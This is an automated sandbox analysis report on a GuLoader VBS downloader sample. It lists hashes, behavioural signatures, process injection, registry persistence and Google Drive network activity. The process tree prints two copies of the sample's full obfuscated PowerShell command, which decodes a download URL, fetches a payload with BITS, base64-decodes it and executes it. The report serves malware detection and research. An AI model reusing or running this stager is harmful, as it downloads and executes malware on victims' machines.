Analysis
-
max time kernel
145s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
29-02-2024 05:23
Static task
static1
Behavioral task
behavioral1
Sample
29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs
Resource
win10v2004-20240226-en
General
-
Target
29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs
-
Size
84KB
-
MD5
d844d1877e456c98d39c5ae4b5afa005
-
SHA1
dd398afb0845afc4b0b180534f06950c500b73d0
-
SHA256
29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f
-
SHA512
43e0e3dd07b8961efd2ca64bfb09f6ac9d53322e2d2eef1e6d5503d56f18854b40b065312dc0af0053d13eabb913660f0130eeda9225659876e94e5b421c7ceb
-
SSDEEP
1536:UO+rAQgFXLEvvR6op8MiqKkjmyJ4BXwljIW84fEeHPD:UNcQgdLEXR6Y8MiqKkjmyJyXUOKD
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-2248906074-2862704502-246302768-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run DevicePairingWizard.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Q2TD0N = "C:\\Program Files (x86)\\windows mail\\wab.exe" DevicePairingWizard.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1888 WScript.exe 5 1888 WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 12 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 576 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2280 powershell.exe 576 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2280 set thread context of 576 2280 powershell.exe 32 PID 576 set thread context of 1184 576 wab.exe 16 PID 576 set thread context of 2992 576 wab.exe 37 PID 2992 set thread context of 1184 2992 DevicePairingWizard.exe 16 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 1864 powershell.exe 2280 powershell.exe 576 wab.exe 576 wab.exe 576 wab.exe 576 wab.exe 576 wab.exe 576 wab.exe 576 wab.exe 576 wab.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 2280 powershell.exe 576 wab.exe 1184 Explorer.EXE 1184 Explorer.EXE 2992 DevicePairingWizard.exe 2992 DevicePairingWizard.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 1888 wrote to memory of 1864 1888 WScript.exe 29 PID 1888 wrote to memory of 1864 1888 WScript.exe 29 PID 1888 wrote to memory of 1864 1888 WScript.exe 29 PID 1864 wrote to memory of 2280 1864 powershell.exe 31 PID 1864 wrote to memory of 2280 1864 powershell.exe 31 PID 1864 wrote to memory of 2280 1864 powershell.exe 31 PID 1864 wrote to memory of 2280 1864 powershell.exe 31 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 2280 wrote to memory of 576 2280 powershell.exe 32 PID 1184 wrote to memory of 2992 1184 Explorer.EXE 37 PID 1184 wrote to memory of 2992 1184 Explorer.EXE 37 PID 1184 wrote to memory of 2992 1184 Explorer.EXE 37 PID 1184 wrote to memory of 2992 1184 Explorer.EXE 37
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29f63518032bfeb419cea2e5fb207fd324a9928b762532c5864198ce6ce30b8f.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$rimen='Sammenvoksnings:\Selbornian';Set-Content $rimen 'Shorter';$Fencing240=Test-Path $rimen;if($Fencing240){exit};function Krybeklderes9 ($Programme){For($Gullbrith=4; $Gullbrith -lt $Programme.Length-1; $Gullbrith+=5){$Interim=$Interim+$Programme.'Substring'($Gullbrith, 1)};$Interim;}$Fleetwing=Krybeklderes9 ' L.vhSeldtSymatRep.pHalvsFl e:In e/met / eadno,crThari Tyvv trbeForm.VenegDefloLithoWe,tg Re,l roeDgnd.Sst,cMicroRedem Fr./UdliuUnidcarbe?synoeNonfxPi,ep Ka.oKratr .ritaltm= RemdF rto NeowBj gnInddlSacro ChiaPudrdHayf&P,pii Zamd L g=.use1WinkOBi.kxWaivX NyhaLopePSpeeJGalaK FulEKrokI,nadY.mmuGBibeAballTFred_TocaXsaniV Da 5Ae,o4 Ka,tc psTAfruZO,err UniJFlosOagtiIfictj nti1 mioc keM Fl,xS,nerEm,tF Umb ';$Interim01=Krybeklderes9 ' ufoiProkeTro.xA dr ';$Traeskaftet = Krybeklderes9 'Samo\ atas anty RafsD ngwValgoStynwRyt.6 ga 4Gl.n\HerlWMultiArbanEum dRedioMicrwRedes AtmPPoetoM llwFrede Lokr Bo,SBrndhEtymeMasklVan,l,yca\Cuvev Pre1Otot.Post0Subw\ ,arpSideo J,gw tttePro.rTvils uzzhPa,aeKynilM.irlSu.p. teteSekox Af eKli ';&($Interim01) (Krybeklderes9 ' rad$sammS.ekaaKlagmat.amMalaePrednN mavspegoDiakkS atsFlyvnAbonis,ornTreeg Ar,sser.2Equ,= hil$KvareDip,n .emvRa,t:Fo,twPhani.gginBo edBegyiTinsr.nst ') ;&($Interim01) (Krybeklderes9 ' C.g$BrunTSo,irSvigaForsemyonsOffikApria Witf aatA oke Opvt Sub=I om$AlteSInfiaMo.emEkspmL,tteRenonC llvTranononekS.itsAmtsn.leaiFlotnFlusgInt s int2Maa,+Nonf$andeT V,tr asaNyste rgtsLit.kPothaSw,efHematScr.eForetinvi ') ;&($Interim01) (Krybeklderes9 'Bulk$DykiNFuldeUncodKvotsFer.kpas.rQu si MenvB.klnHeiniCyton s,agebonsNudnt Veri,rucdUndisForsp HimuHvaln Petk luttMundeurkrrLivsnam,reroma Ata=Sydk Ledv(Ska ( steg etewDecamForsiBety Be wTr,eiIselnOver3U so2 ne_P.eupNonar AltoBrolcRinge,olysEighsHove Gert- Ex Fx,lo C,enPTmrerChibo St.cbynaeAntosDyb.sforbIDiesdden,= Men$Subm{PeriPmyelIHaraD mpl} Exp) Ga..BoniCRelao GudmB xbm ,piaLi yn Un dSearLNatti nstn ebuecont)Pseu Rekv-In.isHomrpRhetlKeroiSo.it ent Mdd.[OdyscOprih AeraAdrerFond]Diab3 Dev4 z,n ');&($Interim01) (Krybeklderes9 'Daem$.aktBca eeSkilcLe.luC nsmBagkb,ldeeCen,rLipo Jog=Unbo Fort$.nanNRo.meSymad JersFissk GodrGeniiAfbrv UdfnPanti StrnEndegRocksTweatAmaliOutwdRetssHu,tp anguRevenInd kCruet areR inrJo.dnPseue Hor[Mikk$ConcNrulleUndadI.disAr okPseurMicriHeptvVi,enKoleiNed.nThrig hesHabetDevoi tild,ryss ubop TriuAlsbnForhkSemitPreaeKat,rSolbn.olleGele. MincSunro,yanuSundn FectFore-vulv2Ph.e] Gen ');&($Interim01) (Krybeklderes9 'Bran$VojeSTematCreoeSapoeSlvbpFangyLrke=Scia(MaduTSo re UndsRa,atInde-,iemPSublaHakktPendhPyro ,erd$KultT DevrHyp.aHjlye AnasEkstk MinaDepofSilktZ ptenon tNats)F nd Li.k-M,seAPretnEkspdForp Fre(etr.[R,nsIAustnSemitSkalPSynatEfterEksa]ambu:Cran: Taes.riniStorz OffeAch Sp.l-PlyseFrstqSkum G.ns8Nonp)C ll ') ;if ($Steepy) {&$Traeskaftet $Becumber;} else {;$Interim00=Krybeklderes9 ' .ftS Ch.tTrilaTh,crWhictY.si- PreB smaiInsetTyp.sEfteTInterTinnaLeatnBlodsHumaf ReveNonqrAmin Blo.- DioSBaseoTagdu TyprKartcMemoeA at B,nd$UdmnF S.dlvibre UnheBryst RegwO.tpiT ennRiddgTapi Sake-TandDRumpeabios.ntetC upiOctonKameaGlaut TidiSvu.oInnunWhis ham$CrosSrhagaServmfilhm.tjgeDedin Kanv.anho SepkFrossDescnSmmoiWal n ,scgDragsRot.2 Su. ';&($Interim01) (Krybeklderes9 'Befu$RestSForkaUdmrmPerjmProceSe.vn Rouvkra.opravkApo.s .nanSouti,urrn astgProts Cho2ti i=Fore$ EsceTsetnLne.vFo,l:unreaTannp DrupskridFiniaSt,tt.orja.nte ') ;&($Interim01) (Krybeklderes9 'ObseIUmbrm.dlepProdoBrumrDinntFlig- IndMhaano Cysd IntuSynglRoutemask SeruB RepiAkkut outsLit TAbstrEkstaOmstnCarysHjrefcytoeCarorChon ') ;$Sammenvoksnings2=$Sammenvoksnings2+'\Inadmissibly.Bet';while (-not $Forelskelsen) {&($Interim01) (Krybeklderes9 ' Pro$ TeoFSvrmo N,nrHaugeHexal uszsK.rtkBje eStralHypes Aute GeinUk.i=Pseu(Kre.TF.rde ars BiltBord-PrepP ,icaTekstTou.h.ini Sht.$ThraSMarga Gi mTra,m ,paePerinKursv,vejo.egrkCabbsCrabnJewsiFunknAnatg mansFlop2 Sob) aar ') ;&($Interim01) $Interim00;&($Interim01) (Krybeklderes9 'RuneSAcertHveraDrmmr .kstNond-RoseSRefllRemoeNaaleA,bepKont Sp,o5Thra ');}&($Interim01) (Krybeklderes9 ',luf$ ModK ngarpriny SvbbFyrteStolkKapllTetrdEupheProrrRelaeCo,tsF.jl Tho =Aer, troGPh.seindktlong-Me,iCAvocoOrmunFi.mt TileThe nAfhatVint Hu,z$,illSSortaHackm ,nomw,maeSkivnNewsv.reno AtekHaussShaknDataiApekn NicgTrans Dej2 I,o ');&($Interim01) (Krybeklderes9 'Invi$DberCBardohentbastobNa eiPecteReto Tol =Info ust[ In SSir ySkatsB.ugtPhobeKr,smAnti. R,sCPainoSpilnBjervGrateIndkrSkritlama],rog:M,si:ClinFgynar GuioS,pumDrgtBForda ,lisKa de ,fp6 Lde4S,faSMtaat ,ror C,oiD,bsn kasg,uar(Forp$ddebKGynkr DelyPaupb oceeHedvk addl padWauke Le,rEbereBehesgarv) Ber ');&($Interim01) (Krybeklderes9 'gymn$AppeIsa.knIn.rtJasue E.srTaariRe nmDra 2F.nd Sate=Horm Hemi[M,crSSt,nyAnhos RhetStu eKog.mfell.Fer,TLammeA,gix .avtOver.FiskE MeenEnv.cFanaogeocdBazei erznK ffgSubc]Arti:Have:Ad.iASmaaSTrevC,oveI,vejIcere.PodoGSpeceStuet resSs,rptLamir latiSla nS argL,ke( Hit$P ukCDisvo SlabRonkbS,eciPecueFlan)Undi ');&($Interim01) (Krybeklderes9 ' U t$photSRo,aaMal,mGa tmFal,eStannGrifsFondt TsuuFi,kv Byge.ricrA.ma= Di,$OpfoIHalfn diltCeliegrmmrCivii NabmInco2 nae.StersAirlumultb albsoza,t subrKulti.oiln MacgTr,l(Afsl3 Pus1Suc 8Aske4 Var3Stir5Bard,Boer3Trbe7Retr7Heav1Spa.9Weat)F.ak ');&($Interim01) $Sammenstuver;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$rimen='Sammenvoksnings:\Selbornian';Set-Content $rimen 'Shorter';$Fencing240=Test-Path $rimen;if($Fencing240){exit};function Krybeklderes9 ($Programme){For($Gullbrith=4; $Gullbrith -lt $Programme.Length-1; $Gullbrith+=5){$Interim=$Interim+$Programme.'Substring'($Gullbrith, 1)};$Interim;}$Fleetwing=Krybeklderes9 ' L.vhSeldtSymatRep.pHalvsFl e:In e/met / eadno,crThari Tyvv trbeForm.VenegDefloLithoWe,tg Re,l roeDgnd.Sst,cMicroRedem Fr./UdliuUnidcarbe?synoeNonfxPi,ep Ka.oKratr .ritaltm= RemdF rto NeowBj gnInddlSacro ChiaPudrdHayf&P,pii Zamd L g=.use1WinkOBi.kxWaivX NyhaLopePSpeeJGalaK FulEKrokI,nadY.mmuGBibeAballTFred_TocaXsaniV Da 5Ae,o4 Ka,tc psTAfruZO,err UniJFlosOagtiIfictj nti1 mioc keM Fl,xS,nerEm,tF Umb ';$Interim01=Krybeklderes9 ' ufoiProkeTro.xA dr ';$Traeskaftet = Krybeklderes9 'Samo\ atas anty RafsD ngwValgoStynwRyt.6 ga 4Gl.n\HerlWMultiArbanEum dRedioMicrwRedes AtmPPoetoM llwFrede Lokr Bo,SBrndhEtymeMasklVan,l,yca\Cuvev Pre1Otot.Post0Subw\ ,arpSideo J,gw tttePro.rTvils uzzhPa,aeKynilM.irlSu.p. teteSekox Af eKli ';&($Interim01) (Krybeklderes9 ' rad$sammS.ekaaKlagmat.amMalaePrednN mavspegoDiakkS atsFlyvnAbonis,ornTreeg Ar,sser.2Equ,= hil$KvareDip,n .emvRa,t:Fo,twPhani.gginBo edBegyiTinsr.nst ') ;&($Interim01) (Krybeklderes9 ' C.g$BrunTSo,irSvigaForsemyonsOffikApria Witf aatA oke Opvt Sub=I om$AlteSInfiaMo.emEkspmL,tteRenonC llvTranononekS.itsAmtsn.leaiFlotnFlusgInt s int2Maa,+Nonf$andeT V,tr asaNyste rgtsLit.kPothaSw,efHematScr.eForetinvi ') ;&($Interim01) (Krybeklderes9 'Bulk$DykiNFuldeUncodKvotsFer.kpas.rQu si MenvB.klnHeiniCyton s,agebonsNudnt Veri,rucdUndisForsp HimuHvaln Petk luttMundeurkrrLivsnam,reroma Ata=Sydk Ledv(Ska ( steg etewDecamForsiBety Be wTr,eiIselnOver3U so2 ne_P.eupNonar AltoBrolcRinge,olysEighsHove Gert- Ex Fx,lo C,enPTmrerChibo St.cbynaeAntosDyb.sforbIDiesdden,= Men$Subm{PeriPmyelIHaraD mpl} Exp) Ga..BoniCRelao GudmB xbm ,piaLi yn Un dSearLNatti nstn ebuecont)Pseu Rekv-In.isHomrpRhetlKeroiSo.it ent Mdd.[OdyscOprih AeraAdrerFond]Diab3 Dev4 z,n ');&($Interim01) (Krybeklderes9 'Daem$.aktBca eeSkilcLe.luC nsmBagkb,ldeeCen,rLipo Jog=Unbo Fort$.nanNRo.meSymad JersFissk GodrGeniiAfbrv UdfnPanti StrnEndegRocksTweatAmaliOutwdRetssHu,tp anguRevenInd kCruet areR inrJo.dnPseue Hor[Mikk$ConcNrulleUndadI.disAr okPseurMicriHeptvVi,enKoleiNed.nThrig hesHabetDevoi tild,ryss ubop TriuAlsbnForhkSemitPreaeKat,rSolbn.olleGele. MincSunro,yanuSundn FectFore-vulv2Ph.e] Gen ');&($Interim01) (Krybeklderes9 'Bran$VojeSTematCreoeSapoeSlvbpFangyLrke=Scia(MaduTSo re UndsRa,atInde-,iemPSublaHakktPendhPyro ,erd$KultT DevrHyp.aHjlye AnasEkstk MinaDepofSilktZ ptenon tNats)F nd Li.k-M,seAPretnEkspdForp Fre(etr.[R,nsIAustnSemitSkalPSynatEfterEksa]ambu:Cran: Taes.riniStorz OffeAch Sp.l-PlyseFrstqSkum G.ns8Nonp)C ll ') ;if ($Steepy) {&$Traeskaftet $Becumber;} else {;$Interim00=Krybeklderes9 ' .ftS Ch.tTrilaTh,crWhictY.si- PreB smaiInsetTyp.sEfteTInterTinnaLeatnBlodsHumaf ReveNonqrAmin Blo.- DioSBaseoTagdu TyprKartcMemoeA at B,nd$UdmnF S.dlvibre UnheBryst RegwO.tpiT ennRiddgTapi Sake-TandDRumpeabios.ntetC upiOctonKameaGlaut TidiSvu.oInnunWhis ham$CrosSrhagaServmfilhm.tjgeDedin Kanv.anho SepkFrossDescnSmmoiWal n ,scgDragsRot.2 Su. ';&($Interim01) (Krybeklderes9 'Befu$RestSForkaUdmrmPerjmProceSe.vn Rouvkra.opravkApo.s .nanSouti,urrn astgProts Cho2ti i=Fore$ EsceTsetnLne.vFo,l:unreaTannp DrupskridFiniaSt,tt.orja.nte ') ;&($Interim01) (Krybeklderes9 'ObseIUmbrm.dlepProdoBrumrDinntFlig- IndMhaano Cysd IntuSynglRoutemask SeruB RepiAkkut outsLit TAbstrEkstaOmstnCarysHjrefcytoeCarorChon ') ;$Sammenvoksnings2=$Sammenvoksnings2+'\Inadmissibly.Bet';while (-not $Forelskelsen) {&($Interim01) (Krybeklderes9 ' Pro$ TeoFSvrmo N,nrHaugeHexal uszsK.rtkBje eStralHypes Aute GeinUk.i=Pseu(Kre.TF.rde ars BiltBord-PrepP ,icaTekstTou.h.ini Sht.$ThraSMarga Gi mTra,m ,paePerinKursv,vejo.egrkCabbsCrabnJewsiFunknAnatg mansFlop2 Sob) aar ') ;&($Interim01) $Interim00;&($Interim01) (Krybeklderes9 'RuneSAcertHveraDrmmr .kstNond-RoseSRefllRemoeNaaleA,bepKont Sp,o5Thra ');}&($Interim01) (Krybeklderes9 ',luf$ ModK ngarpriny SvbbFyrteStolkKapllTetrdEupheProrrRelaeCo,tsF.jl Tho =Aer, troGPh.seindktlong-Me,iCAvocoOrmunFi.mt TileThe nAfhatVint Hu,z$,illSSortaHackm ,nomw,maeSkivnNewsv.reno AtekHaussShaknDataiApekn NicgTrans Dej2 I,o ');&($Interim01) (Krybeklderes9 'Invi$DberCBardohentbastobNa eiPecteReto Tol =Info ust[ In SSir ySkatsB.ugtPhobeKr,smAnti. R,sCPainoSpilnBjervGrateIndkrSkritlama],rog:M,si:ClinFgynar GuioS,pumDrgtBForda ,lisKa de ,fp6 Lde4S,faSMtaat ,ror C,oiD,bsn kasg,uar(Forp$ddebKGynkr DelyPaupb oceeHedvk addl padWauke Le,rEbereBehesgarv) Ber ');&($Interim01) (Krybeklderes9 'gymn$AppeIsa.knIn.rtJasue E.srTaariRe nmDra 2F.nd Sate=Horm Hemi[M,crSSt,nyAnhos RhetStu eKog.mfell.Fer,TLammeA,gix .avtOver.FiskE MeenEnv.cFanaogeocdBazei erznK ffgSubc]Arti:Have:Ad.iASmaaSTrevC,oveI,vejIcere.PodoGSpeceStuet resSs,rptLamir latiSla nS argL,ke( Hit$P ukCDisvo SlabRonkbS,eciPecueFlan)Undi ');&($Interim01) (Krybeklderes9 ' U t$photSRo,aaMal,mGa tmFal,eStannGrifsFondt TsuuFi,kv Byge.ricrA.ma= Di,$OpfoIHalfn diltCeliegrmmrCivii NabmInco2 nae.StersAirlumultb albsoza,t subrKulti.oiln MacgTr,l(Afsl3 Pus1Suc 8Aske4 Var3Stir5Bard,Boer3Trbe7Retr7Heav1Spa.9Weat)F.ak ');&($Interim01) $Sammenstuver;}"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:576
-
-
-
-
-
C:\Windows\SysWOW64\DevicePairingWizard.exe"C:\Windows\SysWOW64\DevicePairingWizard.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2992
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD535f24379c7258fb79edc315234ae9161
SHA19db8e1981018ced1373ce2a3a2fa15fd5057c6c4
SHA256f90b3747aaf11445b9c8fa20a5823da3dc60ef041285ede5688a7e30aaf1a71f
SHA5120f6125bc157056c2124973e9f7971406f4321ed25e5713cd90cf68f223970662aa1f010d9052ff96cb09b3a60cccc9cf3fc2be42d2a46fb916193db0a8c1b521
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD557c709afc390b7a60359729bd393eae4
SHA147805a69d758fea211499eb95daf3dcfa69e6200
SHA256a72c983a35b199133b06023bd02e6937c0d3fee743d1cb16e0f1234c734e3a03
SHA5125f4ca973d5e493632f5db7574aa697313fc89af8e50189f8f870edddbb0660fa9fc55f7ce2e64ed968d029a967572399ec47b389111e93f0a71117480490321c
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KCGLKLR1VUE3UFWZFI3F.temp
Filesize7KB
MD53758500f03792609edac6debcc31a460
SHA1ab2ce92d9971eb335a682d2a9085dcfac3f97a50
SHA25605ff04c07dbc043223afb99ebd593b87afd89b99f0c886ef4b7768548ba5e672
SHA512ce8c5a102620573c47944413c65940371ab71276b0174686c2793b5dfced9c3179bf86f5c3a8d37e93e2d397b5d5fc8c32f2f1a4965a6d9a21d1deef829c70d2